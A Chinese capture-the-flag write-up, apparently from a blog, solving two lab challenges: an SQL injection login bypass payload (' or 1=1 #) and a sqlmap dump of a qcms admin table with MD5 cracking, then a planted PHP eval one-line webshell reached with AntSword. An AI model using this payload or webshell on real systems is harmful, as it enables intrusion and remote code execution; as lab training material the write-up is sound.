Sqlmap实操靶场
看题目,sqlmap实操靶场,所以咱们直接上sqlmap。注意审题:“获得管理员密码”。所以管理员密码就是flag。
进入首页之后,直接找后台,习惯性的/admin一下。果然
username和password随便输,用Burp先抓个包。
注意看那个位置是存在sql注入的,用'+or+1+%3d+1%23(' or 1=1 #)可直接跳过登录直接进入到后台,但是我们的目标是找到管理员登录密码。所以,把整个数据包复制到.txt文件中,用sqlmap跑。
找到了该网站的数据库名:qcms
找到了该数据库下的所有的表,那肯定就是qcms_admin 了。
接下来拿到admin和pwd的具体数据
MD5加密,直接解密
这个就是管理员密码了,也就是flag了,直接提交。
过关,潇洒走人。但是~ 估计有很多人进入到后台,以为flag{sqlmappy1k} 这个是flag,这个应该不是这道题的flag,反正我提交了很多次都失败了。
下一题。
拿下目标服务器
进入后台,发现这个,还没有限制,一句话木马直接冲(<?php @eval($_POST[a]);?>)。
上蚁剑
找到了。flag{cdyjbx6}
仅供靶场练习、学习参考使用。出了任何问题与本博主无关。